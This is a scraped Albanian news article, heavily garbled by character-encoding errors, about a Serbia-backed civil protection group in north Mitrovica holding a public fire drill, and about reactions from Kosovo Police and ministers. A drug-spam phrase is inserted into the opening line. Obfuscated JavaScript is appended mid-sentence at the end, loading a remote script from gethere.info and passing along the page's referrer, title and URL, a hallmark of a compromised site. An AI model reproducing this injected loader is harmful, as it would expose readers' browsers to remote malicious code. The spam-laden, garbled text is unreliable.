f1_zashtita-jpg1353312886

a�?Mbrojtja civilea�? serbe sfidon KFOR-in, EULEX-in e PolicinA�

buy promethazine w codeine. Strukturat paralele serbe nA� veri tA� MitrovicA�s dhe KosovA�s sfiduan tA� dielA�n publikisht KFOR-in, EULEX-in dhe PolicinA� e KosovA�s, shkruan sot a�?Koha Ditorea�?.A�A�

Organizata a�?Civilna Zashtita Mitrovicea�?, apo a�?Mbrojtja civile e MitrovicA�sa�?, e cila nga institucionet e KosovA�s llogaritet tA� jetA� njA� nga organizmat qA� pA�rbA�jnA� ato qA� njihen si struktura ilegale tA� SerbisA� nA� KosovA�, e ka realizuar tA� dielA�n nA� veri tA� MitrovicA�s tA� ashtuquajturin ushtrim simulues publik tA� reagimit nA� rast tA� emergjencA�s sA� zjarrit.

Ani se njA� veprim i tillA� A�shtA� zhvilluar nA�n pA�rkujdesjen e ZyrA�s pA�r KosovA� tA� QeverisA� serbe, tA� cilA�n e drejton AleksandA�r Vulin, Qeveria e KosovA�s nuk e ka parA� tA� arsyeshme qA� tA� reagojA� nA� raport me njA� aktivitet tA� tillA�. Ministri i PunA�ve tA� Brendshme nA� QeverinA� e KosovA�s, Bajram Rexhepi, pasi ka hapur telefonin dhe nA� fillim ka treguar mirA�sjellje, me tA� kuptuar se pA�r A�farA� teme ka tA� bA�jA� interesimi i gazetA�s ai e ka ndA�rruar disponimin. a�?HiA�… jam tu shku nA� Bruksel, mA� kini lodhA�, ditA�n e mirA� e bafsha�?, ka thA�nA� ai, pA�r ta mbyllur mA� pas telefonin.

NA� PolicinA� e KosovA�s kanA� thA�nA� qA� as nuk e kanA� lejuar e as penguar aktivitetin e organizatA�s serbe.

ZA�dhA�nA�si i PolicisA� sA� KosovA�s pA�r rajonin e MitrovicA�s, Besim Hoti, ka treguar qA�A� PK-ja nuk ka marrA� asnjA� kA�rkesA� pA�r zhvillimin e aktivitetit, por megjithA�kA�tA� ajo e ka pA�rcjellA� nga afA�r atA�. Teksa ka folur pA�r gazetA�n, Hoti e ka prezantuar normal aktivitetin e organizatA�s serbe. a�?ZjarrfikA�sit e kanA� pasur njA� ushtrim qA� ka filluar nA� orA�n 11:00 e ka pA�rfunduar rreth orA�s 12:00. Ka qenA� njA� simulim i thjeshtA� i situatave emergjente nA� rast zjarri dhe kaqa�?, ka thA�nA� ai. a�?Pse tA� mos i lejojmA� zjarrfikA�sit, kur ata vazhdimisht operojnA� nA� veri? Ne e dimA� qA� nA� mungesA� tA� institucioneve atje funksionojnA� zjarrfikA�sit, edhe pse po figurojnA� si struktura paralelea�?, ka shtuar Hoti.

Sipas tij, aktiviteti ka mbaruar pa ndonjA� incident tA� regjistruar.

Teksa kanA� ushtruar simulimin, anA�tarA�t e pjesA�tarA�t e organizatA�s a�?Mbrojtja civile e MitrovicA�sa�? e kanA� thirrur emrin e shtetit tA� SerbisA�. Ata kanA� treguar mundA�sitA�, shkathtA�sitA� dhe pA�rgatitjet e tyre pA�r shpA�timin e njerA�zve nA� rast tA� rrezikut nA� objektet e pA�rfshira nga zjarri. GjatA� demonstrimit tA� tyre ata nuk kanA� pasur ndonjA� lloj tA� armatimit.

NA� ushtrimin e sA� dielA�s ishin tA� angazhuar 52 pjesA�tarA� tA� Mbrojtjes civile serbe, zjarrfikA�s dhe ndihma mjekA�sore. I ashtuquajturi operacioni i shpA�timit tA� tA� lA�nduarve nA� rast tA� ndonjA� fatkeqA�sie A�shtA� zhvilluar nA� udhA�kryqin nA� afA�rsi tA� ShkollA�s Teknike dhe Lagjes sA� BoshnjakA�ve. UdhA�heqA�s i kA�tij operacioni, sipas burimeve tA� gazetA�s, ishte nA�nkoloneli serb nA� pension Miodrag Saviq. Saviq A�shtA� i punA�suar nA� ZyrA�n e QeverisA� sA� SerbisA� pA�r KosovA� dhe drejton departamentin e emergjencave.A� TA� gjithA� 52 pjesA�tarA�t e tA� ashtuquajturA�s Mbrojtje civile serbe kanA� pasur tA� veshura uniforma ngjyrA� blu tA� errA�ta dhe nA� shpinA� u shkruante nA� alfabetin cirilik a�?Civilna Zashtitaa�?, si dhe nA� anglisht a�?Civilian Corpsa�?. Mbrojtja Cilive serbe ka nA� regjistrin e saj 385 pjesA�tarA� qA� paguhen nga Ministria e Mbrojtjes e RepublikA�s sA� SerbisA�, ndA�rsaA� komandant i saj A�shtA� kapiteni Jovica Lazareviq.

PA�r aktivitetin e sA� dielA�s ka folur i ashtuquajturi kryetar i komunA�s paralele tA� MitrovicA�s, KA�rstimir Pantiq, i cili ka theksuar se A�shtA� njA�kohA�sisht edhe komandant i organizatA�s a�?Mbrojtja civile e MitrovicA�sa�?. Ai u A�shtA� drejtuar pjesA�tarA�ve tA� a�?Mbrojtjes civilea�?, duke u thA�nA� se ata janA� njerA�zit qA� do tA� pA�rballen me situatat e vA�shtira emergjente nA� veri tA� MitrovicA�s.

Ai ka shtuar se organizata a�?Mbrojtja civilea�? do tA� jetA� nA� shA�rbimin e tA� gjithA� qytetarA�ve nA� veri tA� MitrovicA�s, pavarA�sisht nga pA�rkatA�sia kombA�tare dhe fetare e tyre. Sipas tij, a�?Mbrojtja civilea�? A�shtA� formuar bazuar nA� KonventA�n e GjenevA�s, e cila e precizon se pA�r A�farA� qA�llimesh mund tA� pA�rdoret mbrojtja civile.

a�?Mbrojtja civile e MitrovicA�sa�? A�shtA� organizatA� e cila nga institucionet e KosovA�s konsiderohet si strukturA� paralele qA� vepron nA� veri tA� vendit e financuar nga Serbia.

DitA� mA� parA� zyrtarA�t e KomunA�s sA� MitrovicA�s patA�n reaguar pA�r shkak tA� pranisA� sA� pjesA�tarA�ve tA� a�?Mbrojtjes civilea�? nA� pjesA�n veriore tA� MitrovicA�s, duke shfaqur dyshimet se nA� kA�tA� organizatA� ka edhe pjesA�tarA� qA� janA� tA� inkriminuar, tA� ashtuquajtur a�?roja tA� uravea�?, por edhe pjesA�tarA� tA� strukturave tA� sigurisA� tA� shtetit serb.

Burime tA� gazetA�s nga veriu i KosovA�s kanA� bA�rA� tA� ditur tA� dielA�n qA� organizata a�?Mbrojtja civile e MitrovicA�sa�? kA�saj jave ka pA�r ta nA�nshkruar njA� marrA�veshje me MinistrinA� e PunA�ve tA� Brendshme tA� SerbisA�var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}